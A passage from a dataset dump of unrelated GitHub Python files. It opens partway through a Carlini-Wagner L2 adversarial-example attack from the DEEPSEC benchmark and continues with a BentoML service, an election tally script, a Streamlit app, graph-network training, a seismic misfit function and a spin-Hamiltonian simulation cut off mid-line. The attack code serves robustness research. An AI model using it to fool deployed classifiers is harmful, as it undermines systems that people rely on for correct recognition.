1]\n perturbed_images = torch.tanh(var_samples + modifier) * half_range + mid_point\n prediction = self.model(perturbed_images)\n\n l2dist = torch.sum((perturbed_images - (torch.tanh(var_samples) * half_range + mid_point)) ** 2, [1, 2, 3])\n\n constraint_loss = torch.max((prediction - 1e10 * 
targets_in_one_hot).max(1)[0] - (prediction * targets_in_one_hot).sum(1),\n                                            torch.ones(batch_size, device=device) * self.kappa * -1)\n\n                loss_f = var_const * constraint_loss\n                loss = l2dist.sum() + loss_f.sum()  # minimize |r| + c * loss_f(x+r,l)\n                optimizer.zero_grad()\n                loss.backward(retain_graph=True)\n                optimizer.step()\n\n                # update the best l2 distance, current predication class as well as the corresponding adversarial example\n                for i, (dist, score, img) in enumerate(\n                        zip(l2dist.data.cpu().numpy(), prediction.data.cpu().numpy(), perturbed_images.data.cpu().numpy())):\n                    if dist < best_l2[i] and attack_achieved(score, ys_targets[i]):\n                        best_l2[i] = dist\n                        current_prediction_class[i] = np.argmax(score)\n                        best_perturbation[i] = img\n\n            # update the best constant c for each sample in the batch\n            for i in range(batch_size):\n                if current_prediction_class[i] == ys_targets[i] and current_prediction_class[i] != -1:\n                    c_upper_bound[i] = min(c_upper_bound[i], const_origin[i])\n                    if c_upper_bound[i] < 1e10:\n                        const_origin[i] = (c_lower_bound[i] + c_upper_bound[i]) / 2.0\n                else:\n                    c_lower_bound[i] = max(c_lower_bound[i], const_origin[i])\n                    if c_upper_bound[i] < 1e10:\n                        const_origin[i] = (c_lower_bound[i] + c_upper_bound[i]) / 2.0\n                    else:\n                        const_origin[i] *= 10\n\n        return np.array(best_perturbation)\n\n    def batch_perturbation(self, xs, ys_target, batch_size, device):\n        \"\"\"\n\n        :param xs:\n        :param ys_target:\n        :param batch_size:\n        :param device:\n        :return:\n        \"\"\"\n        assert len(xs) == len(ys_target), \"The lengths of samples and its ys should be equal\"\n\n        adv_sample = []\n        number_batch = int(math.ceil(len(xs) / batch_size))\n        for index in range(number_batch):\n            start = index * batch_size\n            end = min((index + 1) * batch_size, len(xs))\n            print('\\r===> in batch {:>2}, {:>4} ({:>4} in total) nature examples are perturbed ... 
'.format(index, end - start, end), end=' ')\n\n batch_adv_images = self.perturbation(xs[start:end], ys_target[start:end], batch_size, device)\n adv_sample.extend(batch_adv_images)\n return np.array(adv_sample)\n","repo_name":"ryderling/DEEPSEC","sub_path":"Attacks/AttackMethods/CW2.py","file_name":"CW2.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"54"} +{"seq_id":"73902533601","text":"import bentoml\nimport numpy as np\nfrom bentoml.io import NumpyNdarray \n\nmodel_ref = bentoml.sklearn.get(\"mlzoomcamp_homework:jsi67fslz6txydu5\")\n\nmodel_runner = model_ref.to_runner()\nsvc = bentoml.Service(\"homework_1\", runners=[model_runner])\n\n@svc.api(input=NumpyNdarray(), output=NumpyNdarray())\ndef predict(input_series: np.ndarray) -> np.ndarray:\n result = model_runner.predict.run(input_series)\n return result\n","repo_name":"Emekadavid/zoomcode","sub_path":"zoom7/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21971380640","text":"## Opening election_results.csv\n\n# import modules (add our dependencies)\nimport csv\nimport os\n\n# assign a variable for the csv file to load and the path.\nfile_to_load = os.path.join(\"Resources\", \"election_results.csv\")\n# Assign a variable to save the file to a path\nfile_to_save = os.path.join(\"analysis\", \"election_analysis.txt\")\n\n\n# Initialize a total vote counter.\ntotal_votes = 0\n\n# Declare list and print candidate name from each row\ncandidate_options = []\n\n# Declare candidate votes dictionary for candidate name and votes per candidate\ncandidate_votes = {}\n\n# Declare a variable that holds empty string for winning candidate\nwinning_candidate = \"\"\n# Declare a variable for \"winning_count\" equal to 0\nwinning_count = 0\n# Delcare a variable for \"winning_percentage\" equal to 0\nwinning_percentage = 0\n\n \n# Use with statement to open the csv election results and read the file\nwith open(file_to_load) as election_data:\n #Read the file object with the reader function\n file_reader = csv.reader(election_data)\n\n #Read the header row\n headers = next(file_reader)\n\n\n # Create a for loop to loop through all rows for candidate and vote information\n #Print each row in the CSV file\n for row in file_reader:\n\n # add to the total vote count\n total_votes += 1\n\n # get candidates names from the row \n candidate_name = row[2]\n\n # if candidate does not match any existing candidate, create if statement. Within for loop.\n if candidate_name not in candidate_options:\n # add the candidate name to the candidate_options list using append\n candidate_options.append(candidate_name)\n\n # create each candidate as a key for the dictionary above. 
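A minimal driver for the CW2 attack above, assuming the module's repo imports resolve, a model with 10 output classes, and inputs scaled to [0, 1] (the model and data here are placeholders, not the evaluation setup from the paper):

```python
import numpy as np
import torch

# Placeholder model; any nn.Module mapping (N, C, H, W) -> (N, 10) works.
model = torch.nn.Sequential(torch.nn.Flatten(), torch.nn.Linear(28 * 28, 10))
device = torch.device('cpu')

attacker = CW2Attack(model=model, kappa=0, init_const=0.001, lr=0.02,
                     binary_search_steps=2, max_iters=100)

xs = np.random.rand(4, 1, 28, 28).astype(np.float32)  # natural samples in [0, 1]
ys_target = np.array([1, 2, 3, 4])                    # target labels

adv = attacker.batch_perturbation(xs, ys_target, batch_size=4, device=device)
print(adv.shape)  # (4, 1, 28, 28)
```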
Begin tracking candidates vote count.\n            candidate_votes[candidate_name] = 0\n\n        # add a vote to each candidates count to find total votes per candidate (inside the for loop)\n        candidate_votes[candidate_name] += 1\n\n#Save the results to our text file\nwith open(file_to_save, \"w\") as txt_file:\n    #Print the final count to the terminal\n    election_results = (\n        f\"\\nElection Results\\n\"\n        f\"----------------------\\n\"\n        f\"Total Votes: {total_votes:,}\\n\"\n        f\"----------------------\\n\"\n    )\n    print(election_results, end=\"\")\n    #Save the final vote count to the text file\n    txt_file.write(election_results)\n\n    #Create for loop to determine percentage of votes for each candidate by looping through vote counts\n    # Iterate through the candidate list\n    for candidate_name in candidate_votes:\n        # Retreive the vote count of the candidate\n        votes = candidate_votes[candidate_name]\n        # Calculate the percentage of votes\n        vote_percentage = float(votes) / float(total_votes) * 100\n        # 5. Print out each candidates name, vote count and percentage of votes to terminal\n        #print(f\"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\\n\")\n\n        #Add each candidate election results to the text file\n        candidate_results = (f\"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\\n\")\n        #Print the candidate, vote percentage and vote count to the terminal\n        print(candidate_results)\n        #Save candidate results to the text file\n        txt_file.write(candidate_results)\n\n        #Determine winning vote count and candidate\n        #Determine if the votes is greater than the winning count\n        if (votes > winning_count) and (vote_percentage > winning_percentage):\n            #If true, then set winning_count and winning_percent equal to the vote_percentage\n            winning_count = votes\n            winning_percentage = vote_percentage\n            #and set the winning_candidate equal to the candidates name\n            winning_candidate = candidate_name\n\n        \n\n    #Print out the winning candidate summary\n    winning_candidate_summary = (\n        f\"-----------------------------\\n\"\n        f\"Winner: {winning_candidate}\\n\"\n        f\"Winning Vote Count: {winning_count:,}\\n\"\n        f\"Winning Percentage: {winning_percentage:.1f}%\\n\"\n        f\"-----------------------------\\n\"\n    )\n    print(winning_candidate_summary)\n    # Save candidate results to the text file\n    txt_file.write(winning_candidate_summary)\n\n\n\n","repo_name":"corispade/Module3_Election_Analysis","sub_path":"PyPoll.py","file_name":"PyPoll.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"33108801093","text":"import streamlit as st\nfrom PIL import Image\nimport os, sys\nimport json\nimport pandas as pd \nimport requests as rq\n\n# Wherever you see 'pass' it is a TO-DO (pending)\n\n# locate this file and hop up to the project root\npath = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) \nsys.path.append(path)\n\n# import the functions from the project root\nfrom src.utils.stream_config import draw_map\nfrom src.utils.dataframes import load_csv_for_map\nfrom src.utils import sql_functions\n\n\nmenu = st.sidebar.selectbox('Menu:',\n                            options=[\"No selected\", \"Load Image\", \"Map\", \"API\", \"MySQL\", \"Machine Learning\"])\n\nif menu == \"No selected\": \n    # open the configuration file and load its contents into a variable\n    with open(path + os.sep + 'config' + os.sep + 'config.json', 'r') as outfile:\n        json_readed = json.load(outfile)\n\n    # load the 
values just read into the elements shown on screen\n    st.title(json_readed['Title'])\n    st.write(json_readed['Description'])\n    \nif menu == \"Load Image\":\n    # Load the image located at data/img/happy.jpg\n    image = Image.open(path + os.sep + 'data' + os.sep + 'img' + os.sep + 'happy.jpg', 'r') \n    st.image (image,use_column_width=True)\n\nif menu == \"Map\":\n    # The file under data/ named 'red_recarga_acceso_publico_2021.csv'\n    csv_map_path = path + os.sep + 'data' + os.sep + 'red_recarga_acceso_publico_2021.csv'\n    df_map = load_csv_for_map(csv_map_path)\n    draw_map(df_map)\n\nif menu == \"API\":\n    datos_json = rq.get('http://localhost:6060/info').json()\n    st.dataframe(pd.DataFrame(datos_json))\n\nif menu == \"Machine Learning\":\n    \"\"\"6\"\"\"\n\n    # 1. Connect to the DB OK\n    # 2. Using SQL statements (not pandas), fetch the data from the tables starting with 'fire_archive*' (join) OK\n\n    # 3. Train three different ML models with the 'fire_type' column as the target. Use a pipeline that preprocesses the data with PCA. Use Gridsearch.\n    # \n    # \n    # 4. Add one row to the 'student_findings' table for each of the three models. 'student_id' is YOUR-GROUP-ID.\n\n\n    # 5. Fetch the data from the 'fire_nrt_M6_96619' table and use the best model to predict the target column of that data. \n\n    \n    # 6. Using SQL (not pandas), add a new column to the 'fire_nrt_M6_96619' table named 'fire_type_YOUR-GROUP-ID'\n\n\n    # 7. Display the full table (X and y) in Streamlit\n    pass\n\n\n","repo_name":"MikeBarkerSpain/TheDataApes","sub_path":"src/streamlit/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"29825973512","text":"#!/usr/bin/python\n\nfrom coap.resource import CoapResource\nfrom time import sleep\n\n\nres = CoapResource(\"http://localhost:8888\")\n\nres.add_resource(\"r1\", (\"test\",))\nres.add_resource(\"r2\", (\"sensors\", \"temp\"))\n\ndata = {\"type\": \"python\", \"message\": \"\"}\nresources = res.get_resources().keys()\n\ntry:\n    while True:\n        for name in resources:\n            data[\"message\"] = name\n\n            res.send_event(name, data)\n\n        sleep(5)\nexcept KeyboardInterrupt:\n    for name in resources:\n        res.remove_resource(name)\n","repo_name":"QualiApps/coap-subject","sub_path":"example/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"32717155924","text":"import logging\nimport sys\nfrom argparse import ArgumentParser, Namespace\n\nlogger = logging.getLogger(\"wandb\")\nlogger.setLevel(logging.ERROR)\nsys.path.insert(0, \"../MultiOmicsGraphEmbedding/\")\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning.trainer import Trainer\n\nfrom pytorch_lightning.callbacks import EarlyStopping\n\nfrom ogb.nodeproppred import PygNodePropPredDataset\nfrom ogb.linkproppred import PygLinkPropPredDataset\nfrom cogdl.datasets.han_data import ACM_HANDataset, DBLP_HANDataset, IMDB_HANDataset\nfrom cogdl.datasets.gtn_data import ACM_GTNDataset, DBLP_GTNDataset, IMDB_GTNDataset\nfrom torch_geometric.datasets import AMiner\n\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import EarlyStopping\n\nfrom moge.generator import HeteroNeighborSampler, TripletSampler\nfrom moge.module.PyG.node_clf import LATTENodeClassifier\nfrom 
moge.module.PyG.link_pred import LATTELinkPredictor\nfrom run.utils import load_node_dataset\n\n\ndef train(hparams: Namespace):\n NUM_GPUS = hparams.num_gpus\n USE_AMP = False # True if NUM_GPUS > 1 else False\n MAX_EPOCHS = 50\n\n neighbor_sizes = [hparams.n_neighbors, ]\n for t in range(1, hparams.t_order):\n neighbor_sizes.extend([neighbor_sizes[-1] // 2])\n print(\"neighbor_sizes\", neighbor_sizes)\n hparams.neighbor_sizes = neighbor_sizes\n\n dataset = load_node_dataset(hparams.dataset, method=\"LATTE\", hparams=hparams, train_ratio=None,\n dir_path=hparams.dir_path)\n\n METRICS = [\"precision\", \"recall\", \"f1\", \"accuracy\" if dataset.multilabel else hparams.dataset, \"top_k\"]\n hparams.loss_type = \"BCE\" if dataset.multilabel else hparams.loss_type\n hparams.n_classes = dataset.n_classes\n model = LATTENodeClassifier(hparams, dataset, collate_fn=\"neighbor_sampler\", metrics=METRICS)\n\n logger = WandbLogger(name=model.name(), tags=[dataset.name()], project=\"multiplex-comparison\")\n\n trainer = Trainer(\n gpus=NUM_GPUS,\n distributed_backend='ddp' if NUM_GPUS > 1 else None,\n gradient_clip_val=hparams.gradient_clip_val,\n # auto_lr_find=True,\n max_epochs=MAX_EPOCHS,\n # early_stop_callback=EarlyStopping(monitor='val_loss', patience=5, min_delta=0.001, strict=False),\n logger=logger,\n amp_level='O1' if USE_AMP else None,\n precision=16 if USE_AMP else 32\n )\n\n trainer.fit(model)\n trainer.test(model)\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument('--num_gpus', type=int, default=1)\n # parametrize the network\n parser.add_argument('--dataset', type=str, default=\"ogbn-mag\")\n parser.add_argument('--dir_path', type=str, default=\"~/Bioinformatics_ExternalData/OGB/\")\n\n parser.add_argument(\"-d\", '--embedding_dim', type=int, default=128)\n parser.add_argument(\"-t\", '--t_order', type=int, default=2)\n parser.add_argument('-n', '--batch_size', type=int, default=2000)\n parser.add_argument('--n_neighbors', type=int, default=20)\n parser.add_argument('--activation', type=str, default=\"relu\")\n parser.add_argument('--attn_heads', type=int, default=64)\n parser.add_argument('--attn_activation', type=str, default=\"LeakyReLU\")\n parser.add_argument('--attn_dropout', type=float, default=0.2)\n\n parser.add_argument('--nb_cls_dense_size', type=int, default=0)\n parser.add_argument('--nb_cls_dropout', type=float, default=0.3)\n\n parser.add_argument('--use_proximity', type=bool, default=False)\n parser.add_argument('--neg_sampling_ratio', type=float, default=5.0)\n parser.add_argument('--use_class_weights', type=bool, default=False)\n parser.add_argument('--use_reverse', type=bool, default=True)\n\n parser.add_argument('--loss_type', type=str, default=\"SOFTMAX_CROSS_ENTROPY\")\n parser.add_argument('--lr', type=float, default=0.001)\n parser.add_argument('--weight_decay', type=float, default=1e-2)\n parser.add_argument('--gradient_clip_val', type=float, default=1.0)\n # add all the available options to the trainer\n # parser = pl.Trainer.add_argparse_args(parser)\n\n args = parser.parse_args()\n train(args)\n","repo_name":"AspirinCode/MultiOmicsGraphEmbedding","sub_path":"run/latte_node.py","file_name":"latte_node.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29771977140","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nfrom obspy import Trace\nimport 
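The training script above builds its neighbor-sampling fan-out by halving the first-hop size once per additional LATTE order. A tiny check of that construction (example values; the script's defaults are n_neighbors=20, t_order=2):

```python
n_neighbors, t_order = 20, 3
neighbor_sizes = [n_neighbors]
for _ in range(1, t_order):
    neighbor_sizes.append(neighbor_sizes[-1] // 2)
print(neighbor_sizes)  # [20, 10, 5]
```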
obspy.signal.cross_correlation as crosscorr\n\nVERBOSE_NAME = \"Zero-lag Cross-Correlation-Coefficient\"\n\nDESCRIPTION = r\"\"\"\nThis is the CCC misfit as used by famous seismologist Ya-Jian Gao in \nseveral of his publications.\n\"\"\" # NOQA\n\n# Optional: document any additional parameters this particular adjoint sources\n# receives in addition to the ones passed to the central adjoint source\n# calculation function. Make sure to indicate the default values. This is a\n# bit redundant but the only way I could figure out to make it work with the\n# rest of the architecture.\nADDITIONAL_PARAMETERS = r\"\"\"\n**taper_percentage** (:class:`float`)\n Decimal percentage of taper at one end (ranging from ``0.0`` (0%) to\n ``0.5`` (50%)). Defauls to ``0.15``.\n\n**taper_type** (:class:`float`)\n The taper type, supports anything :meth:`obspy.core.trace.Trace.taper`\n can use. Defaults to ``\"cosine\"``.\n\"\"\"\n\n\ndef xcorr_shift(s, d, min_period):\n \"\"\"\n Calculate the correlation time shift around the maximum amplitude of the\n synthetic trace with subsample accuracy.\n \"\"\"\n # Estimate shift and use it as a guideline for the subsample accuracy\n # shift.\n # the dt works if these are obspy traces, currently not sure\n shift = int(np.ceil(min_period / s.stats.delta))\n cc = crosscorr.correlate(s, d, shift=shift)\n time_shift = (cc.argmax() - shift) * s.stats.delta\n return time_shift\n\n\ndef calculate_adjoint_source(observed, synthetic, window, min_period,\n max_period,\n adjoint_src, plot=False, taper=True,\n taper_ratio=0.15, taper_type=\"cosine\",\n **kwargs):\n\n ret_val = {}\n\n if window:\n if len(window) == 2:\n weight = 1.0\n else:\n weight = window[2]\n else:\n weight = 1.0\n\n # Work on copies of the original data\n observed = observed.copy()\n synthetic = synthetic.copy()\n CC = np.sum(observed.data * synthetic.data)\n\n oo = np.sum(observed.data * observed.data)\n ss = np.sum(synthetic.data * synthetic.data)\n weight_2 = np.sqrt(oo * ss)\n\n misfit = 1 - CC / weight_2\n\n\n ret_val[\"misfit\"] = misfit\n\n # # Subsample accuracy time shift\n # time_shift = xcorr_shift(synthetic, observed, min_period)\n # if time_shift >= min_period / 2.0:\n # ret_val[\"adjoint_source\"] = Trace(data=np.zeros_like(observed.data),\n # header=observed.stats)\n # return ret_val\n\n if adjoint_src:\n A = CC / ss\n adj = (observed.data - A * synthetic.data) / weight_2\n adj_src = Trace(data=weight * adj *\n synthetic.stats.delta, header=observed.stats)\n ret_val[\"adjoint_source\"] = adj_src\n\n return ret_val\n","repo_name":"solvithrastar/Inversionson","sub_path":"inversionson/hpc_processing/ccc.py","file_name":"ccc.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"24458764522","text":"\nimport numpy as np\nfrom numpy.linalg import eig\nimport cmath \nimport math\nimport sys\nfrom functools import reduce\nimport scipy\n\ndef random_unit_vector() : \n phi = 2.0 * math.pi * np.random.random()\n z = 2.0 * np.random.random() - 1.0\n r = math.sqrt(1.0 - z*z)\n return np.array([r * math.cos(phi), r * math.sin(phi), z ])\n\nclass Rotation : \n \"\"\" \n * Rotation : provides a representation for 3D space rotations\n * using euler angles (ZX'Z'' convention) or rotation matrices\n \"\"\"\n def _euler2mat_z1x2z3(self, z1 = 0, x2 = 0, z3 = 0) :\n cosz1 = math.cos(z1)\n sinz1 = math.sin(z1)\n Z1 = np.array(\n [[cosz1, -sinz1, 0],\n [sinz1, cosz1, 0],\n [0, 0, 1]])\n\n \n cosx = math.cos(x2)\n sinx 
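The CCC misfit above is 1 minus the normalized zero-lag correlation, so identical traces must give zero misfit and a zero adjoint source. A numpy-only check of those identities, mirroring the formulas in calculate_adjoint_source (no obspy needed):

```python
import numpy as np

d = np.sin(np.linspace(0, 2 * np.pi, 100))  # "observed"
s = d.copy()                                # "synthetic" equal to observed

CC = np.sum(d * s)
weight_2 = np.sqrt(np.sum(d * d) * np.sum(s * s))
misfit = 1.0 - CC / weight_2
print(np.isclose(misfit, 0.0))              # True

A = CC / np.sum(s * s)                      # = 1 when s == d
adj = (d - A * s) / weight_2                # identically zero here
print(np.allclose(adj, 0.0))                # True
```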
= math.sin(x2)\n        X2 = np.array(\n            [[1, 0, 0],\n             [0, cosx, -sinx],\n             [0, sinx, cosx]])\n\n        cosz3 = math.cos(z3)\n        sinz3 = math.sin(z3)\n        Z3 = np.array(\n            [[cosz3, -sinz3, 0],\n             [sinz3, cosz3, 0],\n             [0, 0, 1]])\n        \n        return reduce(np.dot, [Z1, X2, Z3] )\n    \n\n    def _mat2euler(self, M):\n        M = np.asarray(M)\n        try:\n            sy_thresh = np.finfo(M.dtype).eps * 4\n        except ValueError:\n            sy_thresh = np.finfo(float).eps * 4\n        r11, r12, r13, r21, r22, r23, r31, r32, r33 = M.flat\n        sy = math.sqrt(r31*r31 + r32*r32)\n        if sy > sy_thresh: \n            x2 = math.acos(r33)\n            z1 = math.atan2(r13, -r23)\n            z3 = math.atan2(r31, r32)\n        else:\n            x2 = 0\n            z3 = 0\n            z1 = math.atan2(r21, r22)\n        return (z1, x2, z3)\n\n    def _init_from_angles(self, z1, x2, z3) :\n        self._z1, self._x2, self._z3 = z1, x2, z3\n        self._M = self._euler2mat_z1x2z3(self._z1, self._x2, self._z3)\n\n    def _init_from_matrix(self, matrix) :\n        self._M = np.asarray(matrix)\n        self._z1, self._x2, self._z3 = self._mat2euler(self._M) \n\n    def __init__(self, arg1 = None, x2 = None, z3 = None): \n        if arg1 is None :\n            self._init_from_angles(0, 0, 0) # loads identity matrix\n        elif x2 is not None:\n            self._init_from_angles(arg1, x2, z3)\n        elif arg1.size == 3:\n            self._init_from_angles(arg1[0], arg1[1], arg1[2])\n        else:\n            self._init_from_matrix(arg1)\n\n    def matrix(self, new_matrix = None) : \n        if new_matrix is not None:\n            self._init_from_matrix(new_matrix)\n        return self._M\n\n    def euler_angles(self, z1 = None, x2 = None, z3 = None) : \n        if z1 is not None:\n            self._init_from_angles(z1, x2, z3)\n        return (self._z1, self._x2, self._z3)\n\n\n    def random(self) : \n        self.euler_angles( 2. * math.pi * np.random.random(), np.arccos( 2.0 * np.random.random() - 1.0 ), 2. * math.pi * np.random.random() )\n\nclass TripletHamiltonian : \n    def __init__ (self) :\n        self.Id = np.matrix('1 0 0; 0 1 0; 0 0 1', dtype=np.complex_)\n        self.Sz = np.matrix('1 0 0; 0 0 0; 0 0 -1', dtype=np.complex_)\n        self.Sx = np.matrix('0 1 0; 1 0 1; 0 1 0', dtype=np.complex_) / math.sqrt(2.0)\n        self.Sy = - 1j * np.matrix('0 1 0; -1 0 1; 0 -1 0', dtype=np.complex_) / math.sqrt(2.0)\n\n    def fine_structure(self, D, E, rotation = Rotation() ) :\n        rotation_matrix = rotation.matrix()\n        rSx = rotation_matrix[0,0] * self.Sx + rotation_matrix[0,1] * self.Sy + rotation_matrix[0,2] * self.Sz\n        rSy = rotation_matrix[1,0] * self.Sx + rotation_matrix[1,1] * self.Sy + rotation_matrix[1,2] * self.Sz\n        rSz = rotation_matrix[2,0] * self.Sx + rotation_matrix[2,1] * self.Sy + rotation_matrix[2,2] * self.Sz 
        return D * (np.dot(rSz, rSz) - 2.*self.Id/3.) 
+ E * (np.dot(rSy, rSy) - np.dot(rSx, rSx))\n\n    def zeeman(self, Bx, By, Bz) :\n        return Bx * self.Sx + By * self.Sy + Bz * self.Sz\n\n    def spin_hamiltonian_mol_basis(self, D, E, B, theta, phi) : \n        Bz = B * math.cos(theta) \n        Bx = B * math.sin(theta) * math.cos(phi) \n        By = B * math.sin(theta) * math.sin(phi) \n\n        return self.fine_structure(D, E) + self.zeeman(Bx, By, Bz)\n\n    def spin_hamiltonian_field_basis(self, D, E, B, theta, phi) : \n        return self.fine_structure(D, E, Rotation(0, -theta, -phi+math.pi/2.)) + self.zeeman(0, 0, B)\n\n    def eval(self, D, E, B, theta = 0, phi = 0, mol_basis = True) : \n        if mol_basis: \n            return np.linalg.eigvalsh(self.spin_hamiltonian_mol_basis(D, E, B, theta, phi))\n        else: \n            return np.linalg.eigvalsh(self.spin_hamiltonian_field_basis(D, E, B, theta, phi))\n\nclass TwoTriplets :\n    def __init__ (self) :\n        self.triplet = TripletHamiltonian()\n        self.E = None \n        self.D = None \n        self.J = None\n        self.Jdip = None\n        self.B = None\n        self.matrix_size = 9\n\n        s2i3 = math.sqrt(2.0/3.0)\n        si2 = 1.0/math.sqrt(2.0)\n        si3 = 1.0/math.sqrt(3.0)\n        si6 = 1.0/math.sqrt(6.0)\n        \n        self.Jproj = np.array( [ [ 0, 0, si3, 0, -si3, 0, si3, 0, 0 ],\n                 [ 0, 0, 0, 0, 0, -si2, 0, si2, 0 ],\n                 [ 0, 0, -si2, 0, 0, 0, si2, 0, 0 ],\n                 [ 0, -si2, 0, si2, 0, 0, 0, 0, 0 ],\n                 [ 0, 0, 0, 0, 0, 0, 0, 0, 1.0 ],\n                 [ 0, 0, 0, 0, 0, si2, 0, si2, 0 ],\n                 [ 0, 0, si6, 0, s2i3, 0, si6, 0, 0 ], \n                 [ 0, si2, 0, si2, 0, 0, 0, 0, 0 ],\n                 [ 1.0, 0, 0, 0, 0, 0, 0, 0, 0 ] ] )\n\n    def exchange_matrix(self) : \n        return np.kron(self.triplet.Sx, self.triplet.Sx) + np.kron(self.triplet.Sy, self.triplet.Sy) + np.kron(self.triplet.Sz, self.triplet.Sz)\n
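\n    # What follows is the standard point-dipole coupling between the two\n    # triplet spins, S1.S2 - 3*(u.S1)(u.S2) for a unit vector u along the\n    # inter-triplet axis; the overall prefactor is supplied by Jdip where this\n    # matrix enters the full Hamiltonian.\n    def dipole_dipole_matrix(self, uvec) : \n        \"\"\"\n        Returns the dipole-dipole interaction matrix; uvec is a 3d direction\n        vector (it is normalized internally).\n        \"\"\"\n        unorm = np.linalg.norm(uvec)\n        uvec = uvec / unorm \n        uS = uvec[0] * self.triplet.Sx + uvec[1] * self.triplet.Sy + uvec[2] * self.triplet.Sz\n        return (self.exchange_matrix() - 3. 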
* np.kron(uS, uS))\n\n    def load_field_basis_Hamiltonian(self, triplet1_rotation, triplet2_rotation, dip_vec = None) : \n        H1 = self.triplet.fine_structure(self.D, self.E, triplet1_rotation) + self.triplet.zeeman(0, 0, self.B)\n        H2 = self.triplet.fine_structure(self.D, self.E, triplet2_rotation) + self.triplet.zeeman(0, 0, self.B)\n        self.Hfull = np.kron(H1, self.triplet.Id) + np.kron(self.triplet.Id, H2) + self.J * self.exchange_matrix() \n        if dip_vec is not None:\n            self.Hfull += self.Jdip * self.dipole_dipole_matrix(dip_vec)\n        \n    def diag(self) :\n        self.eval,self.evec = np.linalg.eigh(self.Hfull)\n\n    def quintet_content(self, i): \n        iProj = np.dot( self.Jproj[4:9, 0:9], self.evec[0:9, i:i+1] )\n        norm2 = np.dot( np.matrix.getH(iProj), iProj )\n        return norm2[0,0].real\n\n    def triplet_content(self, i): \n        iProj = np.dot( self.Jproj[1:4, 0:9], self.evec[0:9, i:i+1] )\n        norm2 = np.dot( np.matrix.getH(iProj), iProj )\n        return norm2[0,0].real\n\n    def singlet_content(self, i): \n        iProj = np.dot( self.Jproj[0:1, 0:9], self.evec[0:9, i:i+1] )\n        norm2 = np.dot( np.matrix.getH(iProj), iProj )\n        return norm2[0,0].real\n\n    \n    def sz_elem(self, i): \n        Sz2 = np.kron(self.triplet.Sz, self.triplet.Id) + np.kron(self.triplet.Id, self.triplet.Sz)\n        vi = self.evec[:,i]\n        Sz2ii = reduce(np.dot, [ np.matrix.getH(vi), Sz2, vi ])\n        return Sz2ii[0,0].real \n\n    def singlet_projector(self):\n        singlet_state = np.asmatrix(self.Jproj[0:1,:])\n        return np.dot( np.matrix.getH(singlet_state), singlet_state )\n\n\n    def Bac_field_basis_matrix(self): \n        return np.kron(self.triplet.Sx, self.triplet.Id) + np.kron(self.triplet.Id, self.triplet.Sx)\n\n    def print_info(self) : \n        print(\"# D %g\" % self.D)\n        print(\"# E %g\" % self.E)\n        print(\"# B %g\" % self.B)\n        print(\"# J %g\" % self.J)\n        print(\"# Jdip %g\" % self.Jdip)\n\nclass ODMR_Signal : \n    \"\"\" \n    * ODMR_Signal\n    *\n    * Output : Computes ODMR and magnetic resonance signals \n    *\n    * Input : spins, a reference on SpinSystem object\n    * SpinSystem should define \n    *   spins.matrix_size\n    *   spins.evec\n    *   spins.eval\n    *   spins.singlet_projector()\n    *   spins.Bac_field_basis_matrix()\n    \"\"\"\n    def __init__(self, spin_system) : \n        self.spins = spin_system \n        self.rho0 = np.empty(self.spins.matrix_size, dtype=float)\n        self.rho2 = np.empty([self.spins.matrix_size, self.spins.matrix_size], dtype=np.complex_) \n        self.gamma = None\n        self.gamma_diag = None\n\n    def update_from_spin_hamiltonian(self) : \n        self.Sproj_eig_basis = reduce(np.dot, [ np.matrix.getH( self.spins.evec ), self.spins.singlet_projector(), self.spins.evec])\n        self.V = reduce(np.dot, [ np.matrix.getH( self.spins.evec ), self.spins.Bac_field_basis_matrix(), self.spins.evec ])\n        \n    def omega_nm(self, n, m) :\n        return self.spins.eval[n] - self.spins.eval[m]\n\n    def load_rho0_thermal(self, Temp): \n        total = 0\n        for i in range(self.spins.matrix_size) : \n            rho_i = math.exp(- self.spins.eval[i] / Temp)\n            self.rho0[i] = rho_i\n            total += rho_i\n        self.rho0 /= total\n\n    def load_rho0_from_singlet(self) : \n        total = 0\n        for i in range(self.spins.matrix_size) : \n            self.rho0[i] = self.Sproj_eig_basis[i, i].real\n            total += self.rho0[i]\n        self.rho0 /= total\n
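\n    # chi1 below evaluates the first-order (linear) susceptibility of the\n    # driven spin system,\n    #   chi^(1)(omega) = - sum_{m,n} (rho0_m - rho0_n) |V_mn|^2\n    #                      / (omega_nm - omega - i*gamma),\n    # the standard perturbative linear-response expression, read off directly\n    # from the loop body.\n    def chi1(self, omega):\n        c1 = 0j\n        for m in range(self.spins.matrix_size): \n            for n in range(self.spins.matrix_size): \n                # The n == m terms contribute nothing to chi1, so whether gamma\n                # is the same for diagonal and off-diagonal elements is not\n                # relevant here.\n                Vmn = self.V[m, n]\n                Vmn_abs2 = Vmn.real * Vmn.real + Vmn.imag * Vmn.imag\n                c1 -= (self.rho0[m] - self.rho0[n]) * Vmn_abs2 / ( 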
